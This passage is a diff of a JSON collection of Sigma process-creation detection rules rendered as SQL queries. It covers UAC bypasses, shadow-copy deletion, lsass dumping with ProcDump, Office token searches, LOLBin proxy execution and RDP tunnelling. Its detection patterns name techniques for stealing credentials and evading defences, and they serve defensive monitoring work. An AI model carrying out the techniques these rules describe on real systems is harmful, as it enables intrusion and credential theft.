'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\CurrentVersion\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%sethc.exe%' ESCAPE '\\' OR CommandLine LIKE '%utilman.exe%' ESCAPE '\\' OR CommandLine LIKE '%osk.exe%' ESCAPE '\\' OR CommandLine LIKE '%magnify.exe%' ESCAPE '\\' OR CommandLine LIKE '%narrator.exe%' ESCAPE '\\' OR CommandLine LIKE '%displayswitch.exe%' ESCAPE '\\' OR CommandLine LIKE '%atbroker.exe%' ESCAPE '\\' OR CommandLine LIKE '%HelpPane.exe%' ESCAPE '\\'))" ], - 
"filename": "proc_creation_win_uac_bypass_wsreset.yml" + "filename": "proc_creation_win_registry_install_reg_debugger_backdoor.yml" }, { - "title": "Deletion of Volume Shadow Copies via WMI with PowerShell", - "id": "21ff4ca9-f13a-41ad-b828-0077b2af2e40", + "title": "Powershell Token Obfuscation - Process Creation", + "id": "deb9b646-a508-44ee-b7c9-d8965921c6b6", "status": "experimental", - "description": "Detects deletion of Windows Volume Shadow Copies with PowerShell code and Get-WMIObject. This technique is used by numerous ransomware families such as Sodinokibi/REvil", - "author": "Tim Rauch", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%Get-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%gwmi%' ESCAPE '\\' OR CommandLine LIKE '%Get-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%gcim%' ESCAPE '\\') AND CommandLine LIKE '%Win32\\_Shadowcopy%' ESCAPE '\\' AND (CommandLine LIKE '%.Delete()%' ESCAPE '\\' OR CommandLine LIKE '%Remove-WmiObject%' ESCAPE '\\' OR CommandLine LIKE '%rwmi%' ESCAPE '\\' OR CommandLine LIKE '%Remove-CimInstance%' ESCAPE '\\' OR CommandLine LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR CommandLine REGEXP '\"(\\{\\d\\})+\"\\s*-f' OR CommandLine REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}'))" ], - "filename": "proc_creation_win_powershell_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_token_obfuscation.yml" }, { - "title": "Potential Procdump Evasion", - "id": 
"79b06761-465f-4f88-9ef2-150e24d3d737", + "title": "UAC Bypass Using DismHost", + "id": "853e74f9-9392-4935-ad3b-2e8c040dae86", "status": "test", - "description": "Detects uses of the SysInternals Procdump utility in which procdump or its output get renamed or a dump file is moved ot copied to a different name", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1036", - "attack.t1003.001" + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ - "Cases in which procdump just gets copied to a different directory without any renaming" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%copy procdump%' ESCAPE '\\' OR CommandLine LIKE '%move procdump%' ESCAPE '\\') OR (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '%.dmp %' ESCAPE '\\' AND (CommandLine LIKE '%2.dmp%' ESCAPE '\\' OR CommandLine LIKE '%lsass%' ESCAPE '\\' OR CommandLine LIKE '%out.dmp%' ESCAPE '\\')) OR (CommandLine LIKE '%copy lsass.exe\\_%' ESCAPE '\\' OR CommandLine LIKE '%move lsass.exe\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\DismHost.exe%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" ], - "filename": "proc_creation_win_sysinternals_procdump_evasion.yml" + "filename": "proc_creation_win_uac_bypass_dismhost.yml" }, { - "title": "Invoke-Obfuscation VAR+ Launcher", - "id": "27aec9c9-dbb0-4939-8422-1742242471d0", - "status": "test", - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "author": "Jonathan 
Cheong, oscd.community", + "title": "Lolbin Defaultpack.exe Use As Proxy", + "id": "b2309017-4235-44fe-b5af-b15363011957", + "status": "experimental", + "description": "Detect usage of the \"defaultpack.exe\" binary as a proxy to launch other programs", + "author": "frack113", "tags": [ + "attack.t1218", "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.execution" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%cmd%' ESCAPE '\\' AND CommandLine LIKE '%\"set%' ESCAPE '\\' AND CommandLine LIKE '%-f%' ESCAPE '\\' AND (CommandLine LIKE '%/c%' ESCAPE '\\' OR CommandLine LIKE '%/r%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\defaultpack.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_var.yml" + "filename": "proc_creation_win_lolbin_defaultpack.yml" }, { - "title": "Rundll32 UNC Path Execution", - "id": "5cdb711b-5740-4fb2-ba88-f7945027afac", + "title": "Regasm/Regsvcs Suspicious Execution", + "id": "cc368ed0-2411-45dc-a222-510ace303cb2", "status": "experimental", - "description": "Detects rundll32 execution where the DLL is located on a remote location (share)", + "description": "Detects suspicious execution of Regasm/Regsvcs utilities", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1021.002", - "attack.t1218.011" + "attack.t1218.009" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR OriginalFileName = 'RUNDLL32.EXE' OR CommandLine LIKE '%rundll32%' ESCAPE '\\') AND CommandLine LIKE '% 
\\\\\\\\\\*' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND (CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\')) OR (((Image LIKE '%\\\\Regsvcs.exe' ESCAPE '\\' OR Image LIKE '%\\\\Regasm.exe' ESCAPE '\\') OR OriginalFileName IN ('RegSvcs.exe', 'RegAsm.exe')) AND NOT ((CommandLine LIKE '%.dll%' ESCAPE '\\') OR ((CommandLine LIKE '%\\\\Regasm.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regasm.exe' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe\"' ESCAPE '\\' OR CommandLine LIKE '%\\\\Regsvcs.exe' ESCAPE '\\'))))))" ], - "filename": "proc_creation_win_rundll32_unc_path.yml" + "filename": "proc_creation_win_lolbin_regasm.yml" }, { - "title": "Suspicious Windows Trace ETW Session Tamper Via Logman.EXE", - "id": "cd1f961e-0b96-436b-b7c6-38da4583ec00", + "title": "DLL Execution via Rasautou.exe", + "id": "cd3d1298-eb3b-476c-ac67-12847de55813", "status": "test", - "description": "Detects the execution of \"logman\" utility in order to disable or delete Windows trace sessions", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.", + "author": "Julia Fomina, oscd.community", "tags": [ "attack.defense_evasion", - "attack.t1562.001", - "attack.t1070.001" + "attack.t1218" ], "falsepositives": [ - "Legitimate deactivation by administrative 
staff", - "Installer tools that disable services, e.g. before log collection agent installation" + "Unlikely" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\logman.exe' ESCAPE '\\' OR OriginalFileName = 'Logman.exe') AND (CommandLine LIKE '%stop %' ESCAPE '\\' OR CommandLine LIKE '%delete %' ESCAPE '\\') AND (CommandLine LIKE '%Circular Kernel Context Logger%' ESCAPE '\\' OR CommandLine LIKE '%EventLog-%' ESCAPE '\\' OR CommandLine LIKE '%SYSMON TRACE%' ESCAPE '\\' OR CommandLine LIKE '%SysmonDnsEtwSession%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rasautou.exe' ESCAPE '\\' OR OriginalFileName = 'rasdlui.exe') AND (CommandLine LIKE '% -d %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_logman_disable_eventlog.yml" + "filename": "proc_creation_win_lolbin_rasautou_dll_execution.yml" }, { - "title": "Suspicious Mshta.EXE Execution Patterns", - "id": "e32f92d1-523e-49c3-9374-bdb13b46a3ba", - "status": "experimental", - "description": "Detects suspicious mshta process execution patterns", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "title": "Possible Privilege Escalation via Weak Service Permissions", + "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", + "status": "test", + "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.execution", - "attack.t1106" + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image 
LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR OriginalFileName = 'MSHTA.EXE') AND NOT ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.htm%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\') OR (CommandLine LIKE '%mshta.exe' ESCAPE '\\' OR CommandLine LIKE '%mshta' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE '%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_mshta_susp_pattern.yml" + "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" }, { - "title": "Lolbin Unregmp2.exe Use As Proxy", - "id": "727454c0-d851-48b0-8b89-385611ab0704", + "title": "Suspicious WMIC Execution Via Office Process", + "id": "e1693bc8-7168-4eab-8718-cdcaa68a1738", "status": "experimental", - "description": "Detect usage of the \"unregmp2.exe\" binary as a proxy to launch a custom version of \"wmpnscfg.exe\"", - "author": "frack113", + "description": "Office application called wmic to proxye 
execution through a LOLBIN process. This is often used to break suspicious parent-child chain (Office app spawns LOLBin).", + "author": "Vadim Khrykov, Cyb3rEng", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\unregmp2.exe' ESCAPE '\\' OR OriginalFileName = 'unregmp2.exe') AND CommandLine LIKE '% /HideWMP%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EXCEL.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\POWERPNT.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSPUB.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\VISIO.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\MSACCESS.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\ONENOTE.EXE' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordpad.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wordview.exe' ESCAPE '\\') AND (Image LIKE '%\\\\wbem\\\\WMIC.exe' ESCAPE '\\' OR OriginalFileName = 'wmic.exe') AND (CommandLine LIKE '%process%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%call%' ESCAPE '\\' AND (CommandLine LIKE '%regsvr32%' ESCAPE '\\' OR CommandLine LIKE '%rundll32%' ESCAPE '\\' OR CommandLine LIKE '%msiexec%' ESCAPE '\\' OR CommandLine LIKE '%mshta%' ESCAPE '\\' OR CommandLine LIKE '%verclsid%' ESCAPE '\\' OR CommandLine LIKE '%wscript%' ESCAPE '\\' OR CommandLine LIKE '%cscript%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_unregmp2.yml" + "filename": "proc_creation_win_wmic_susp_execution_via_office_process.yml" }, { - "title": "Renamed ProcDump Execution", - "id": 
"4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67", + "title": "Netsh Allow Group Policy on Microsoft Defender Firewall", + "id": "347906f3-e207-4d18-ae5b-a9403d6bcdef", "status": "test", - "description": "Detects the execution of a renamed ProcDump executable often used by attackers or malware", - "author": "Florian Roth (Nextron Systems)", + "description": "Adversaries may modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1036.003" + "attack.t1562.004" ], "falsepositives": [ - "Procdump illegaly bundled with legitimate software", - "Administrators who rename binaries (should be investigated)" + "Legitimate administration activity" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'procdump' OR ((CommandLine LIKE '% -ma %' ESCAPE '\\' OR CommandLine LIKE '% /ma %' ESCAPE '\\') AND (CommandLine LIKE '% -accepteula %' ESCAPE '\\' OR CommandLine LIKE '% /accepteula %' ESCAPE '\\'))) AND NOT ((Image LIKE '%\\\\procdump.exe' ESCAPE '\\' OR Image LIKE '%\\\\procdump64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%advfirewall%' ESCAPE '\\' AND CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%rule%' ESCAPE '\\' AND CommandLine LIKE '%group=%' ESCAPE '\\' AND CommandLine LIKE '%new%' ESCAPE '\\' AND CommandLine LIKE '%enable=Yes%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_renamed_sysinternals_procdump.yml" + "filename": "proc_creation_win_netsh_fw_enable_group_rule.yml" }, { - "title": "Windows Internet Hosted WebDav Share Mount Via Net.EXE", - "id": "7e6237fe-3ddb-438f-9381-9bf9de5af8d0", + "title": "Suspicious AgentExecutor 
PowerShell Execution", + "id": "c0b40568-b1e9-4b03-8d6c-b096da6da9ab", "status": "experimental", - "description": "Detects when an internet hosted webdav share is mounted using the \"net.exe\" utility", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy \"Bypass\" or any binary named \"powershell.exe\" located in the path provided by 6th positional argument", + "author": "Nasreddine Bencherchali (Nextron Systems), memory-shards", "tags": [ - "attack.lateral_movement", - "attack.t1021.002" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\') OR OriginalFileName IN ('net.exe', 'net1.exe')) AND (CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% http%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\AgentExecutor.exe' ESCAPE '\\' OR OriginalFileName = 'AgentExecutor.exe') AND (CommandLine LIKE '% -powershell%' ESCAPE '\\' OR CommandLine LIKE '% -remediationScript%' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_net_use_mount_internet_share.yml" + "filename": "proc_creation_win_lolbin_agentexecutor_susp_usage.yml" }, { - "title": "CL_LoadAssembly.ps1 Proxy Execution", - "id": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "title": "Add User to Local Administrators Group", + "id": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", "status": "experimental", - "description": "Detects the use of a 
Microsoft signed script to execute commands and bypassing AppLocker.", - "author": "frack113", + "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1216" + "attack.persistence", + "attack.t1098" ], "falsepositives": [ - "Unknown" + "Administrative activity" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%\\\\CL\\_LoadAssembly.ps1%' ESCAPE '\\' OR CommandLine LIKE '%LoadAssemblyFromPath %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%localgroup %' ESCAPE '\\' AND CommandLine LIKE '% /add%' ESCAPE '\\') OR (CommandLine LIKE '%Add-LocalGroupMember %' ESCAPE '\\' AND CommandLine LIKE '% -Group %' ESCAPE '\\')) AND (CommandLine LIKE '% administrators %' ESCAPE '\\' OR CommandLine LIKE '% administrateur%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_cl_loadassembly.yml" + "filename": "proc_creation_win_susp_add_user_local_admin_group.yml" }, { - "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", - "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "title": "Hidden Powershell in Link File Pattern", + "id": "30e92f50-bb5a-4884-98b5-d20aa80f3d7a", "status": "test", - "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", - "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "description": "Detects events that appear when a user click on a link file with a powershell 
command in it", + "author": "frack113", "tags": [ - "attack.t1218", - "attack.defense_evasion" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "The process spawned by vsjitdebugger.exe is uncommon." + "Legitimate commands in .lnk files" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.lnk%' ESCAPE '\\')" ], - "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" + "filename": "proc_creation_win_susp_embed_exe_lnk.yml" }, { - "title": "Active Directory Structure Export Via Csvde.EXE", - "id": "e5d36acd-acb4-4c6f-a13f-9eb203d50099", + "title": "Suspicious Office Token Search Via CLI", + "id": "6d3a3952-6530-44a3-8554-cf17c116c615", "status": "experimental", - "description": "Detects the execution of \"csvde.exe\" in order to export organizational Active Directory structure.", + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". 
This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.exfiltration" + "attack.credential_access", + "attack.t1528" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\csvde.exe' ESCAPE '\\' OR OriginalFileName = 'csvde.exe') AND CommandLine LIKE '% -f%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% -i%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%eyJ0eXAiOi%' ESCAPE '\\' OR CommandLine LIKE '% eyJ0eX%' ESCAPE '\\' OR CommandLine LIKE '% \"eyJ0eX\"%' ESCAPE '\\' OR CommandLine LIKE '% ''eyJ0eX''%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csvde_export.yml" + "filename": "proc_creation_win_susp_office_token_search.yml" }, { - "title": "Potential SystemNightmare Exploitation Attempt", - "id": "c01f7bd6-0c1d-47aa-9c61-187b91273a16", - "status": "test", - "description": "Detects an exploitation attempt of SystemNightmare in order to obtain a shell as LOCAL_SYSTEM", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential PsExec Remote Execution", + "id": "ea011323-7045-460b-b2d7-0f7442ea6b38", + "status": "experimental", + "description": "Detects potential psexec command that initiate execution on a remote systems via common commandline flags used by the utility", + "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1068" + "attack.resource_development", + "attack.t1587.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '%printnightmare.gentilkiwi.com%' ESCAPE 
'\\' OR CommandLine LIKE '% /user:gentilguest %' ESCAPE '\\' OR CommandLine LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%accepteula%' ESCAPE '\\' AND CommandLine LIKE '% -u %' ESCAPE '\\' AND CommandLine LIKE '% -p %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')" ], - "filename": "proc_creation_win_exploit_other_systemnightmare.yml" + "filename": "proc_creation_win_sysinternals_psexec_remote_execution.yml" }, { - "title": "Suspicious Ping/Del Command Combination", - "id": "54786ddc-5b8a-11ed-9b6a-0242ac120002", + "title": "File Download Using Notepad++ GUP Utility", + "id": "44143844-0631-49ab-97a0-96387d6b2d7c", "status": "experimental", - "description": "Detects a method often used by ransomware. Which combines the \"ping\" to wait a couple of seconds and then \"del\" to delete the file in question. Its used to hide the file responsible for the initial infection for example", - "author": "Ilya Krestinichev", + "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.004" + "attack.command_and_control", + "attack.t1105" ], "falsepositives": [ - "Unknown" + "Other parent processes other than notepad++ using GUP that are not currently identified" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (CommandLine LIKE '% -n %' ESCAPE '\\' OR CommandLine LIKE '% /n %' ESCAPE '\\') AND CommandLine LIKE '%Nul%' ESCAPE '\\' AND (CommandLine LIKE '% /f %' ESCAPE '\\' OR CommandLine LIKE '% -f %' ESCAPE '\\' OR CommandLine LIKE '% /q %' ESCAPE '\\' OR CommandLine LIKE '% -q %' ESCAPE '\\') AND CommandLine LIKE '%ping%' ESCAPE '\\' AND CommandLine LIKE '%del %' ESCAPE '\\')" + "SELECT * FROM 
logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\GUP.exe' ESCAPE '\\' OR OriginalFileName = 'gup.exe') AND (CommandLine LIKE '% -unzipTo %' ESCAPE '\\' AND CommandLine LIKE '%http%' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\notepad++.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_cmd_ping_del_combined_execution.yml" + "filename": "proc_creation_win_gup_download.yml" }, { - "title": "Potential RDP Tunneling Via SSH Plink", - "id": "f38ce0b9-5e97-4b47-a211-7dc8d8b871da", + "title": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand", + "id": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", "status": "test", - "description": "Execution of plink to perform data exfiltration and tunneling", - "author": "Florian Roth (Nextron Systems)", + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Administrative activity" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:127.0.0.1:3389%' ESCAPE '\\') OR (Image LIKE '%\\\\plink.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\' AND (CommandLine LIKE '% -P 443%' ESCAPE '\\' OR CommandLine LIKE '% -P 22%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%Invoke-ATHRemoteFXvGPUDisablementCommand %' ESCAPE '\\' AND (CommandLine LIKE '%-ModuleName %' ESCAPE '\\' OR CommandLine LIKE '%-ModulePath %' ESCAPE '\\' OR CommandLine LIKE '%-ScriptBlock %' ESCAPE '\\' OR CommandLine LIKE '%-RemoteFXvGPUDisablementFilePath%' ESCAPE '\\'))" ], - 
